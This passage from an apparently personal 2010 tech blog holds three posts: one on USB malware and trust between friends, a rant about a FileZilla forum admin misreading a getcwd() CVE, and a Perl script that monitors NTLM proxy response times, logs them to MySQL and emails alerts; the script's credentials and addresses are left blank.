So now what if we take our hypothetical situation one step further? What if the malware isn't recognized by your AV? Now we have an infected computer. Your friend brings his USB drive over a couple of days later to copy some files. It's his USB drive; he knows where it's been. He knows you're a smart guy, so your computer should be safe. He takes the infected drive home, and now infects his machine. The cycle is obvious, of course. Yes, these hypothetical people should have autorun turned off, we all know that by now, so this example is not perfect. The issue is the trust factor, though. In these situations, there is no "blame it on the user"; they had every reason to trust these sources. It seems like the only answer is "don't trust anyone or anything". I'd love to see people's thoughts on this.

Monday, 8 March 2010

This is just sad

So I was taking a poke at a friend's server, doing a preliminary sweep for them. I noticed that they were running FileZilla 0.9.33, so I did a quick Google search for "filezilla 0.9.33 vuln". What I came up with scared me a little. It wasn't that I found some huge gaping vulnerability, but rather a level of ignorance from one of FileZilla's forum admins that was simply astounding. You can see the forum thread here, and find the CVE for the vulnerability being discussed here. The vulnerability under discussion is an information disclosure in the getcwd() function.

The site admin, botg, replies, "What is FTP getcwd()? There's no such thing". Botg seems to think that the posting is about misuse of an FTP protocol command. He is then presented, by another user, with the CVE for this vulnerability. He replies, "Thank you, I know how to use Google. Doesn't change the fact that there's no such thing as FTP getcwd(), whatever that means". This is the statement that, more than anything else, blows me away.

In the scan results the original user posted, it says:
Details: The FTP daemon exhibits a descriptor leak in the getcwd (get current working directory) function.
Extra info: None.
Fix: Upgrade your libc C library to the current version.
And in botg's reply, he even includes the function brackets when referring to getcwd. Funny, botg, that sure looks like a programming function call, now doesn't it? His snarky reply even sows the seeds of his own demise: "I know how to use google". Oh really? Let me help you out. As the first link describes the C function getcwd(), I would say you seem to have some problems using Google after all. I would also say that you obviously have no understanding of how software vulnerabilities happen. If you think vulnerabilities happen by some command the user can just type in to "hack the gibson", you need to stop watching TV, mate. "It's not my job to know these things," you might say. No, but you are in the position of helping users, and this one came to you with a question. Rather than doing any decent amount of research, you opened your mouth and inserted your foot. Let's forget the whole Google bit, or the fact that it is immediately obvious that this is a C function call. I once again point you to the scan results the user posted:

Fix: Upgrade your libc C library to the current version.

Hrm, I wonder if that might provide a clue as to what's going on here? If this is the level of support a FileZilla user can expect, I feel very sorry for them.

Update: I decided to register for their forums so I could post some useful advice to this thread; I would take the high road instead of just sitting back and being snarky myself. Imagine my surprise when my confirmation email arrived to activate my account, with my username and password both in it in plaintext...uggggg. These people make me want to cry!

Friday, 5 March 2010

Monitoring those NTLM authentication Proxies

So, now that we have discussed how to overcome the challenge of testing those NTLM proxies, we move on to a better use. Load testing is fine and good, but how often do you really need to load test? Let's say, though, that you have a couple dozen of these proxies spread out all over the globe, and for some reason MOM just doesn't cut it for monitoring actual request performance on them.

Using the base design of the previous script, I created one that tests each proxy in the environment once, through the same URL, and measures the delay in the response. This is not 100% accurate, as internal networking issues can cause some unaccounted-for fluctuation, but it is good enough for general purposes. So I created a MySQL database with two tables. One is a status table, which contains the proxy, a counter, and the current known status. This is especially useful because the script pulls the proxies to test from this table, so adding or removing proxies is just a matter of doing it in the database instead of altering code. The other table is a simple log; a schema sketch follows.
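For reference, here is roughly what those two tables look like. The column types and sizes are my own guesses, since all the script actually needs is a proxy URL, a status string, a consecutive-check counter, and a delay log; the credentials are placeholders.

#!/usr/bin/perl -w
use strict;
use DBI;

# One-off setup sketch for the Proxy_Health database (placeholder credentials).
my $dbh = DBI->connect('DBI:mysql:Proxy_Health', 'monitor', 'secret')
    or die $DBI::errstr;

# Column order matters to the script below: proxy, status, count.
$dbh->do(q{
    CREATE TABLE status (
        proxy  VARCHAR(255) NOT NULL,
        status VARCHAR(16)  NOT NULL DEFAULT 'GOOD',
        count  INT          NOT NULL DEFAULT 0
    )
});

$dbh->do(q{
    CREATE TABLE chklog (
        proxy VARCHAR(255) NOT NULL,
        delay DECIMAL(8,2) NOT NULL
    )
});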

The script times the delay from the initiation of the request to the final response, and then assigns a status based on that result. It compares this to the current status listed for that proxy; if it is different, it updates the table and emails out an alert. If the proxy continues in a persistent bad state, it will send out a new alert on every 12th straight return of that bad status. This ensures we are notified that the status is persisting, but doesn't flood us every 10 minutes, which is how frequently the script runs. Anyways, without further ado, here is my simplistic little proxy monitoring script.

----------------code--------------------

#!/usr/bin/perl -w
use threads;
use DBI;
use LWP;
use LWP::UserAgent;
use HTTP::Request;
use Authen::NTLM(nt_hash, lm_hash);
use Authen::NTLM::HTTP;
use Time::HiRes qw( gettimeofday );
use Math::Round;
use Net::SMTP;

#Opens the connection to the database and prepares the statement handles we will need to call on.
our $dbh = DBI->connect("DBI:mysql:Proxy_Health", , ) or die "Unable to connect to database $DBI::errstr";
our $statuschk = $dbh->prepare("SELECT * from status WHERE proxy=?");
our $statusupd = $dbh->prepare("UPDATE status SET status=? , count=? where proxy=?");
our $logsth=$dbh->prepare("INSERT INTO chklog(proxy,delay) VALUES(?,?)");

#pulls the list of proxies from the database and maps them to a hash
%proxies= map {$_ => 0 } @{ $dbh->selectcol_arrayref("Select proxy from status" )};

#generates a worker thread for each proxy to test
 my $threadcount = 0;
 foreach (keys %proxies){
$threadcount+=1;
$thrs[$threadcount]= threads->create(\&Test, $_);

}
#performs the blocking join for the threads. keys %proxies enumerates in the same order as the creation loop above, so we count up again to pair each proxy with its own thread (counting down here would pair the first proxy with the last thread), then log each result into the chklog table
 my $joincount = 0;
 foreach (keys %proxies){
$joincount+=1;
$proxies{$_}= $thrs[$joincount]->join;
$proxy_human = $_ ;
$proxy_human=~s/http:\/\///;
$proxy_human=~s/:80//;
$logsth->execute($proxy_human, $proxies{$_});
}

#Takes the results, and compares the current status of the proxy to the last recorded status of the proxy. If the status has changed, it updates the status table and sends an alert. If the status has remained the same but is in a negative state, it increments a counter. Every 12th check that returns that negative result will generate a new alert.
foreach (keys %proxies){
my $scount = 0;
if ($proxies{$_}>= 120){ $status = 'DOWN';}
elsif ($proxies{$_}>= 90){ $status = 'CRITICAL';}
elsif ($proxies{$_}>= 60){ $status = 'MAJOR';}
elsif ($proxies{$_}>= 40){ $status = 'MINOR';}
elsif ($proxies{$_}>= 20){ $status = 'SLOW';}
else{$status = 'GOOD';}
$statuschk->execute($_);
my @statusline = $statuschk->fetchrow_array;

if ($status eq $statusline[1]){
# 'next', not 'last': a healthy proxy should not stop us from checking the rest
if ($status eq 'GOOD'){next;}
elsif ($statusline[2]==11){
# every 12th consecutive bad check resets the counter to 1, which re-fires the alert via the $scount==1 test below
$scount = 1;
}
else{
$scount= $statusline[2] +1;
}
if ($scount==1){
&Alert($_, $status);
print "ALERT $_ !\n";
}
$statusupd->execute($status,$scount,$_);
}
else{
if ($status eq 'GOOD'){$scount=0;}
else{$scount=1;}
$statusupd->execute($status,$scount,$_);
&Alert($_, $status);
print "ALERT $_ !\n";
}
}

 #

 #This function is what the worker threads run to test their given proxy.
sub Test{
#pulls the proxy from the passed parameters, sets the target as maps.google.com because that site is set to 'private' meaning the proxy will not cache it. It then retrieves the hostname of the local machine and the login credentials, so that it can properly negotiate NTLM authentication with the proxy server
my $proxy=$_[0];
my $url="http://maps.google.com";
our $workstation = `hostname` ;
chomp $workstation; #strip the trailing newline from the backticks so the NTLM messages get a clean hostname
my $user=;
my $my_pass = ;

#instantiates the LWP user agent, sets the proxy, and sets the timeout to 120 seconds, because this is the timeout used on our ISA installs
my $ua =  new LWP::UserAgent(keep_alive=>1);
$ua->proxy('http', $proxy);
$ua->timeout(120);

#Creates the first request for the target website, starts the counter running and then fires off the request
my $req = HTTP::Request->new(GET => $url);
my $start = gettimeofday();
my $res = $ua->request($req);


#Sets up the data about the client to send the NTLM Authentication Negotiation Message
$client = new_client Authen::NTLM::HTTP(lm_hash($my_pass), nt_hash($my_pass),Authen::NTLM::HTTP::NTLMSSP_HTTP_PROXY, $user, , , $workstation, );

$flags = Authen::NTLM::NTLMSSP_NEGOTIATE_ALWAYS_SIGN | Authen::NTLM::NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED | Authen::NTLM::NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED | Authen::NTLM::NTLMSSP_NEGOTIATE_NTLM | Authen::NTLM::NTLMSSP_NEGOTIATE_OEM ;
$negotiate_msg = $client->http_negotiate($flags);

#Takes the negotiation message and sets it as a header in the request and resends the request
$negotiate_msg = "Proxy-" . $negotiate_msg ;
@pa = split(/:/,$negotiate_msg);
$req->header($pa[0] => $pa[1]);
$res = $ua->request($req);

#Strips the NTLM challenge message from the response header and parses it
my $challenge_msg = "Proxy-Authenticate: " . $res->header("Proxy-Authenticate");

($domain, $flags, $nonce, $ctx_upper, $ctx_lower) = $client->http_parse_challenge($challenge_msg);

#touch the parsed fields we don't otherwise use, presumably to keep 'used only once' warnings quiet
if ($domain or $ctx_upper or $ctx_lower){$placeholder=1;}

#Takes the nonce and flags from the challenge message, calculates the final authentication message, sets it as a header and sends it in the final request, receiving the originally requested page in response
$flags = Authen::NTLM::NTLMSSP_NEGOTIATE_ALWAYS_SIGN | Authen::NTLM::NTLMSSP_NEGOTIATE_NTLM | Authen::NTLM::NTLMSSP_REQUEST_TARGET;
$auth_msg = $client->http_auth($nonce, $flags);

@pa = split(/:/,$auth_msg);
$req->header($pa[0] => $pa[1]);
$res = $ua->request($req);

#Stops the timer, calculates the elapsed time rounded to the nearest hundredth of a second, and returns that value to the main thread
my $end = gettimeofday();
my $delta = ($end - $start);
$delta= nearest(.01,$delta);
print "Finished getting $url through $proxy in $delta seconds! \n";
return $delta;

}

#This function actually handles the generation of the email alert for a status change. Depending on the status it picks from different wordings in the email subject and message.
sub Alert{
my $proxy = $_[0];
my $status=$_[1];


if ($status eq 'GOOD'){
$subject="Subject: $proxy has returned to Normal Operation";
$message = "The ProxyHealth Monitor has detected that proxy $proxy has returned to a 'GOOD' status and is retrieving pages within an acceptable timeframe.";
}
elsif ($status eq 'SLOW'){
$subject="Subject: $proxy is experiecing delay";
$message="The ProxyHealth Monitor has detected that the proxy $proxy is experiencing slowness in processing web requests. The system will continue to monitor and will send an update when the status changes.";
}
elsif($status eq 'MINOR'){
$subject="Subject: $proxy is experiencing a Performance Problem";
$message="The ProxyHealth Monitor has detected that the proxy $proxy is suffering noticeable slowness in processing web requests. It's current status is rated as 'MINOR'. The system will continue to monitor and will send an update when the status changes.";
}
elsif($status eq 'MAJOR'){
$subject="Subject: $proxy is experiencing a Major Performance Problem";
$message="The ProxyHealth Monitor has detected that the proxy $proxy is suffering serious slowness in processing web requests. It's current status is rated as 'MAJOR'. The system will continue to monitor and will send an update when the status changes.";
}
elsif($status eq 'CRITICAL'){
$subject="Subject: $proxy is experiencing a Critical Performance Problem";
$message="The ProxyHealth Monitor has detected that the proxy $proxy is facing a 'CRITICAL' performance decrease. Web traffic throguh this proxy will be extremely slow. The system will continue to monitor and will send an update when the status changes.";
}
elsif($status eq 'DOWN'){
$subject="Subject: $proxy is DOWN!";
$message="The ProxyHealth Monitor has detected that traffic through $proxy is exceeding the timeout limit of 2 minutes. This has led to the system declaring the proxy as being 'DOWN'. Web requests through this proxy will FAIL due to timeout. The system will continue to monitor and will send an update when the status changes.";
}



my $mailer= Net::SMTP->new(, Hello=> );
$mailer->mail();
$mailer->to();
$mailer->data();
#Sets the UK and US Security Team Distribution lists as the Recipients
$mailer->datasend('To: , ');
$mailer->datasend("\n");
$mailer->datasend('Return-Path:');
$mailer->datasend("\n");
#Sets a header that will tell the mail client that replies are to go to the Security Distribution lists and not back to the fake address used to send the alert.
$mailer->datasend('Reply-To:, ');
$mailer->datasend("\n");
$mailer->datasend('FROM:');
$mailer->datasend("\n");
#Sets the message importance to high
$mailer->datasend('Importance: High');
$mailer->datasend("\n");
$mailer->datasend($subject);
$mailer->datasend("\n\n");
$mailer->datasend($message);
$mailer->dataend();
$mailer->quit;



}